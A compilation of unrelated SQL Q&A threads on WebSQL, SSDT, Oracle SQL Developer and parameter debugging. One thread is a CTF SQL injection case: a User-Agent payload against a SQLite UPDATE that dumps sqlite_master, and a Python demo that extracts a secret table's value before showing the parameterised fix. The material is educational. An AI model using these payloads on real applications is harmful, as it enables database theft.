Chrome's Developer Tools have a handy prompt on the Resources page where I can execute SQL on my actual WebSQL database. But if the SQL is parameterised like this:
select * from SomeTable where ImportantField = ?
I get a message like this:
Number of '?'s in statement string does not match argument count
I know this is a SQLite message, but I don't see an obvious way to supply the arguments in Chrome Dev Tools. Is it possible?
You are not possibly trying to execute that SQL as-is on the prompt, are you?
If yes, then obviously you are wrong.
Why do you care about ? when you are executing your SQL on the console? Why not simply use the value:
select * from SomeTable where ImportantField = 'yourValue'
I've been attempting to increase my knowledge and trying out some challenges. I've been going at this for a solid two weeks now and have finished most of the challenge, but this one part remains. The error is shown below; what am I not understanding?
Error in sqlite query: update users set last_browser= 'mozilla' + select sql from sqlite_master'', last_time= '13-04-2019' where id = '14'
edited for clarity:
I'm trying a CTF challenge and I'm completely new to this kind of thing so I'm learning as I go. There is a login page with test credentials we can use for obtaining many of the flags. I have obtained most of the flags and this is the last one that remains.
After I login on the webapp with the provided test credentials, the following messages appear: this link
The question for the flag is "What value is hidden in the database table secret?"
So from the previous image, I have attempted to use sql injection to obtain value. This is done by using burp suite and attempting to inject through the user-agent.
I have gone through many variants of the injection attempt shown above. I'm struggling to find out where I am going wrong, especially since the second single quote is added automatically in the query. I've gone through the SQLite documentation and examples of SQL injection, but I cannot seem to understand what I am doing wrong or how to get that to work.
A subquery such as select sql from sqlite_master should be enclosed in brackets.
So you'd want
update user set last_browser= 'mozilla' + (select sql from sqlite_master''), last_time= '13-04-2019' where id = '14';
Although I don't think that will achieve what you want, which isn't clear. A simple test results in :-
You may want a concatenation of the strings, so instead of + use ||. e.g.
update user set last_browser= 'mozilla' || (select sql from sqlite_master''), last_time= '13-04-2019' where id = '14';
In which case you'd get something like :-
Thanks for everyone's input, I've worked this out.
The sql query was set up like this:
update users set last_browser= '$user-agent', last_time= '$current_date' where id = '$id_of_user'
edited user-agent with burp suite to be:
Mozilla', last_browser=(select sql from sqlite_master where type='table' limit 0,1), last_time='13-04-2019
Iterating with that, I found all tables, columns and flags. Rather time consuming, but I could not find a way to optimise it.
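The injection above works because the user-agent is spliced into the SQL text, so a single quote closes the string literal and the rest of the payload becomes part of the UPDATE. The following is an added example, not code from the challenge or from the poster: it rebuilds the statement from the self-answer against an in-memory SQLite database with a constructed users table and a constructed secret table, runs the posted payload to read sqlite_master one table at a time, then swaps the subquery for one that reads the secret value, and finally runs the same payload through the ? placeholders that the first question on this page asks about, where it is stored as a harmless string. The table and column names of the secret table, the flag value and the helper names are assumptions made for the example.

```python
import sqlite3

# Constructed schema for the example. The challenge's real secret table layout
# is not known, so a single "value" column is assumed here.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, last_browser TEXT, last_time TEXT);"
        "CREATE TABLE secret (id INTEGER PRIMARY KEY, value TEXT);"
        "INSERT INTO users VALUES (14, 'none', 'never');"
        "INSERT INTO secret VALUES (1, 'flag{constructed-sample-value}');"
    )
    return conn


def update_vulnerable(conn, user_agent, current_date, user_id):
    # Same template as the post: values are pasted straight into the SQL text,
    # so a quote in user_agent ends the literal and the remainder is parsed as SQL.
    sql = (
        f"update users set last_browser= '{user_agent}', "
        f"last_time= '{current_date}' where id = '{user_id}'"
    )
    conn.execute(sql)
    conn.commit()
    return sql


def update_parameterised(conn, user_agent, current_date, user_id):
    # The fix: ? placeholders, with the values passed to the driver out of band.
    # The same placeholder syntax is what WebSQL's executeSql(sql, args) uses.
    conn.execute(
        "update users set last_browser= ?, last_time= ? where id = ?",
        (user_agent, current_date, user_id),
    )
    conn.commit()


def read_last_browser(conn, user_id):
    # Stands in for whatever page echoed last_browser back to the CTF player.
    row = conn.execute(
        "select last_browser from users where id = ?", (user_id,)
    ).fetchone()
    return row[0]


# Exact payload from the self-answer. In SQLite, when a column is assigned twice
# in one UPDATE the rightmost assignment wins, which is why the injected
# last_browser=(subquery) overrides the 'Mozilla' prefix.
PAYLOAD = (
    "Mozilla', last_browser=(select sql from sqlite_master "
    "where type='table' limit 0,1), last_time='13-04-2019"
)


def dump_table_ddl(conn, index):
    # Iterate the LIMIT offset to walk sqlite_master one CREATE statement at a time.
    payload = (
        "Mozilla', last_browser=(select sql from sqlite_master "
        f"where type='table' limit {index},1), last_time='13-04-2019"
    )
    update_vulnerable(conn, payload, "13-04-2019", "14")
    return read_last_browser(conn, 14)


def steal_secret(conn):
    # Once the DDL has revealed the secret table's columns, read the row itself.
    payload = (
        "Mozilla', last_browser=(select value from secret limit 0,1), "
        "last_time='13-04-2019"
    )
    update_vulnerable(conn, payload, "13-04-2019", "14")
    return read_last_browser(conn, 14)


if __name__ == "__main__":
    db = build_db()
    print(update_vulnerable(db, PAYLOAD, "13-04-2019", "14"))   # the rewritten statement
    print(dump_table_ddl(db, 0))                                  # CREATE TABLE users ...
    print(dump_table_ddl(db, 1))                                  # CREATE TABLE secret ...
    print(steal_secret(db))                                       # the constructed flag
    update_parameterised(db, PAYLOAD, "13-04-2019", 14)
    print(read_last_browser(db, 14))                              # the payload, stored as text
```

The offset-per-request loop in dump_table_ddl is the "rather time consuming" iteration the self-answer describes: with an UPDATE as the injection point there is no result set to page through, so each request leaks one value through the column that the application later displays. With the parameterised variant the same payload is stored verbatim and the subquery never executes.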
When using SSDT what I miss most is the ability to script the select statement of the top x rows like in SSMS.
Does anyone know if it's possible to turn that on somehow by an powertool or extension that enables the "Script As" functionality in SSDT?
You can right-click a database in the SQL Server Object Explorer (part of SSDT) and choose "New Query..." to get a query window. From there you can write and execute any query you like.
I've also got Redgate's SQL Prompt installed (I work for them), so typing "st100" gets me a top X query quickly -- the built-in intellisense may have something similar.
Is there any way to see what the SQL looks like after the parameters are resolved?
For example here is a small part of my SQL:
([Event].[Start_Time] LIKE @StartTimeValue)
And my parm:
SqlDataSourceObject.SelectParameters.Add("StartTimeValue", TypeCode.DateTime, StartTimeValue)
But what does the final SQL look like when the parm @StartTimeValue is replaced with the value in StartTimeValue?
How can I see that?
Thanks for your help.
Do you have access to the database server? From there you could run a tool like SQL Profiler.
Another way is to set a break point just before the query is executed and examine the variables that went in. Usually the issue lies somewhere with the variables you're passing in (they are null, etc) and not with the resolved query itself. You could also set it up in a SQL query window like so:
-- Declare the variable to be used.
DECLARE @StartTimeValue datetime;
-- Initialize the variable.
SET @StartTimeValue = '<PASTE VARIABLE VALUE YOU GOT FROM DEBUGGING HERE>';
SELECT * FROM [Event] WHERE ([Event].[Start_Time] LIKE @StartTimeValue);
I am a newb to Oracle. I used to use SQL Plus, and use set serveroutput on to see the results. However, when I started using Oracle Developer, my queries would run, but I was not able to see the console or the results:
select *
from customer;
I assume that you mean "Oracle SQL Developer" application.
If yes, then in SQL Developer click on the View menu and select DBMS Output.
The DBMS Output window (panel) should appear somewhere on the screen.
Then click on the green plus sign in the DBMS Output panel and select the session you want to spy on.
How can I view the results returned by a pipelined function in Oracle SQL Developer ?
I'm invoking the function using a simple select..from dual like
select piaa_extract.FN_PIAA_EXTRACT('01-JAN-00','01-JAN-12') FROM DUAL
and the result I get is
IQCFINAL.REC_PIAA(IQCFINAL.REC_PIAA,IQCFINAL.REC_PIAA,.....,IQCFINAL.REC_PIAA)
Allround Automations' PL/SQL developer displays the results beautifully in a tabular format, but I do not have a license for the full version of PL/SQL developer.
SQL*Plus' output isn't very good either, though better than Oracle SQL Developer's.
Any thoughts ?
Typically, you'd use
select * from table(piaa_extract.FN_PIAA_EXTRACT('01-JAN-00','01-JAN-12'))
Does that work?